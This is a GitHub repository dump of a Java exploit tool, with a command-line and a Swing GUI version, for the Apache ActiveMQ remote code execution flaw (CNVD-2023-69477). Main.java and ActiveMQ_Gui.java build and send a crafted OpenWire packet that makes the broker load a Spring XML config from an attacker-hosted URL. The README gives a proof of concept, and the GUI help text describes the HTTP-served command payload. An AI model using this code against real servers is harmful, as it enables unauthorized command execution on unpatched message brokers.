├── pics.gif ├── src ├── META-INF │ └── MANIFEST.MF ├── Main.java ├── ActiveMQ_Gui.java └── ActiveMQ_Gui.form ├── .idea ├── .gitignore ├── vcs.xml ├── modules.xml ├── misc.xml ├── artifacts │ ├── exp_jar.xml │ └── console_jar.xml └── uiDesigner.xml ├── exp.iml ├── .gitignore └── README.md /pics.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ImuSpirit/ActiveMQExploit/HEAD/pics.gif -------------------------------------------------------------------------------- /src/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: Main 3 | 4 | -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/artifacts/exp_jar.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/out/artifacts/exp_jar 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/artifacts/console_jar.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/out/artifacts/console_jar 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /exp.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ### IntelliJ IDEA ### 2 | out/ 3 | 4 | !**/src/main/**/out/ 5 | !**/src/test/**/out/ 6 | 7 | ### Eclipse ### 8 | .apt_generated 9 | .classpath 10 | .factorypath 11 | .project 12 | .settings 13 | .springBeans 14 | .sts4-cache 15 | bin/ 16 | !**/src/main/**/bin/ 17 | !**/src/test/**/bin/ 18 | 19 | ### NetBeans ### 20 | /nbproject/private/ 21 | /nbbuild/ 22 | /dist/ 23 | /nbdist/ 24 | /.nb-gradle/ 25 | 26 | ### VS Code ### 27 | .vscode/ 28 | 29 | ### Mac OS ### 30 | .DS_Store -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ActiveMQ 漏洞利用工具 2 | 0vercl0k 3 | 4 | Apache ActiveMQ < 5.18.3 CNVD-2023-69477 5 | 6 | 加强版:https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max 7 | 8 | ## 加强版版本 9 | ### v1.0.2 10 | - 添加代理 11 | - 去掉Help按钮 12 | 13 | ![pics.gif](pics.gif) 14 | 15 | 16 | Vuln Ana Code: 17 | ```Java 18 | package org.example; 19 | 20 | import org.apache.activemq.ActiveMQConnectionFactory; 21 | import org.apache.activemq.ActiveMQSession; 22 | import org.apache.activemq.command.ExceptionResponse; 23 | import org.springframework.context.support.ClassPathXmlApplicationContext; 24 | 25 | import javax.jms.*; 26 | 27 | public class Main { 28 | public static void main(String[] args) throws Exception { 29 | ConnectionFactory connectionFactory = new 30 | ActiveMQConnectionFactory("tcp://localhost:61616"); //目标地址 31 | 32 | Connection connection = connectionFactory.createConnection("admin", "admin"); 33 | connection.start(); 34 | ActiveMQSession session = (ActiveMQSession) connection.createSession(); 35 | ExceptionResponse exceptionResponse = new ExceptionResponse(); 36 | 37 | exceptionResponse.setException(new ClassPathXmlApplicationContext("http://127.0.0.1:8000/pom.xml")); 38 | 39 | session.syncSendPacket(exceptionResponse); 40 | 41 | connection.close(); 42 | } 43 | } 44 | ``` -------------------------------------------------------------------------------- /src/Main.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.net.Socket; 3 | public class Main { 4 | public static void main(String[] args) { 5 | try{ 6 | System.out.println("[+] ActiveMQ Exploit v1.0.0 By:0vercl0k"); 7 | if (args.length < 2) { 8 | 9 | System.err.println("Usage: java exploit.jar "); 10 | System.exit(1); 11 | } 12 | String ip = args[0]; 13 | int port = Integer.parseInt(args[1]); 14 | Socket sck = new Socket(ip, port); 15 | System.out.println("[+] Connect to TargetIp:"+ip); 16 | DataOutputStream out = null; 17 | DataInputStream in = null; 18 | out = new DataOutputStream(new BufferedOutputStream(new FileOutputStream("process.dat"))); 19 | out.writeInt(32); 20 | out.writeByte(31); 21 | out.writeInt(1); 22 | out.writeBoolean(true); 23 | out.writeInt(1); 24 | out.writeBoolean(true); 25 | out.writeBoolean(true); 26 | 27 | out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext"); 28 | out.writeBoolean(true); 29 | out.writeUTF(args[2]); 30 | out.close(); 31 | System.out.println("[*] Start exploiting the vulnerability"); 32 | in = new DataInputStream(new BufferedInputStream(new FileInputStream("process.dat"))); 33 | 34 | 35 | OutputStream os = sck.getOutputStream(); 36 | int length = in.available(); 37 | byte[] buf = new byte[length]; 38 | in.readFully(buf); 39 | System.out.println("[+] Trigger Vulnerability"); 40 | os.write(buf); 41 | in.close(); 42 | sck.close(); 43 | try { 44 | File delfile = new File("process.dat"); 45 | delfile.delete(); 46 | 47 | }catch (Exception error){ 48 | error.printStackTrace(); 49 | } 50 | System.out.println("[+] Vulnerability exploit completed"); 51 | }catch (Exception error){ 52 | error.printStackTrace(); 53 | System.out.println("未知错误"); 54 | System.exit(0); 55 | } 56 | } 57 | } -------------------------------------------------------------------------------- /src/ActiveMQ_Gui.java: -------------------------------------------------------------------------------- 1 | import javax.swing.*; 2 | import java.awt.*; 3 | import java.awt.event.ActionEvent; 4 | import java.awt.event.ActionListener; 5 | import java.io.*; 6 | import java.net.Socket; 7 | 8 | public class ActiveMQ_Gui { 9 | private JPanel panel1; 10 | private JTextField IPField; 11 | 12 | 13 | private JButton button1; 14 | private JTextArea textArea1; 15 | private JTextField PortField; 16 | private JTextField textField1; 17 | private JButton helpButton; 18 | public void AreaAppend(String Text ){ 19 | textArea1.append(Text+"\n"); 20 | } 21 | public ActiveMQ_Gui() { 22 | button1.addActionListener(new ActionListener() { 23 | @Override 24 | public void actionPerformed(ActionEvent e) { 25 | try{ 26 | AreaAppend("[+] ActiveMQ Exploit v1.0.0 By:0vercl0k"); 27 | if (IPField.getText().equals("") && PortField.getText().equals("")) { 28 | AreaAppend("请输入目标地址与端口"); 29 | 30 | 31 | } 32 | String ip = IPField.getText(); 33 | int port = Integer.parseInt(PortField.getText()); 34 | Socket sck = new Socket(ip, port); 35 | AreaAppend("[+] Connect to TargetIp:"+ip); 36 | DataOutputStream out = null; 37 | DataInputStream in = null; 38 | 39 | out = new DataOutputStream(new BufferedOutputStream(new FileOutputStream("pom.xml"))); 40 | out.writeInt(32); 41 | out.writeByte(31); 42 | out.writeInt(1); 43 | out.writeBoolean(true); 44 | out.writeInt(1); 45 | out.writeBoolean(true); 46 | out.writeBoolean(true); 47 | 48 | out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext"); 49 | out.writeBoolean(true); 50 | out.writeUTF(textField1.getText()); 51 | 52 | 53 | out.close(); 54 | AreaAppend("[*] Start exploiting the vulnerability"); 55 | in = new DataInputStream(new BufferedInputStream(new FileInputStream("pom.xml"))); 56 | OutputStream os = sck.getOutputStream(); 57 | int length = in.available(); 58 | byte[] buf = new byte[length]; 59 | in.readFully(buf); 60 | AreaAppend("[+] Trigger Vulnerability"); 61 | os.write(buf); 62 | in.close(); 63 | sck.close(); 64 | try { 65 | File delfile = new File("process.dat"); 66 | delfile.delete(); 67 | }catch (Exception error){ 68 | error.printStackTrace(); 69 | } 70 | AreaAppend("[+]Vulnerability exploit completed"); 71 | 72 | }catch (Exception error){ 73 | error.printStackTrace(); 74 | AreaAppend("未知错误"); 75 | System.exit(0); 76 | } 77 | } 78 | }); 79 | 80 | helpButton.addActionListener(new ActionListener() { 81 | @Override 82 | public void actionPerformed(ActionEvent e) { 83 | AreaAppend("Please configure the Payload and download it through HTTP. The content is:"); 84 | AreaAppend("\n\n\n" + 85 | "\n" + 86 | "\n" + 87 | " \n" + 88 | " \n" + 89 | " \n" + 90 | " open\n" + 91 | " -a\n" + 92 | " calculator\n" + 93 | " \n" + 94 | " \n" + 95 | " \n" + 96 | "\n\n"); 97 | } 98 | }); 99 | } 100 | 101 | public static void main(String[] args) { 102 | JFrame frame = new JFrame("ActiveMQ Exploit v1.0.0 By:0vercl0k"); 103 | frame.setContentPane(new ActiveMQ_Gui().panel1); 104 | 105 | frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); 106 | 107 | 108 | frame.pack(); 109 | frame.setSize(1000, 1000); 110 | frame.setVisible(true); 111 | } 112 | } 113 | -------------------------------------------------------------------------------- /src/ActiveMQ_Gui.form: -------------------------------------------------------------------------------- 1 | 2 |

3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 |

127 | -------------------------------------------------------------------------------- /.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | --------------------------------------------------------------------------------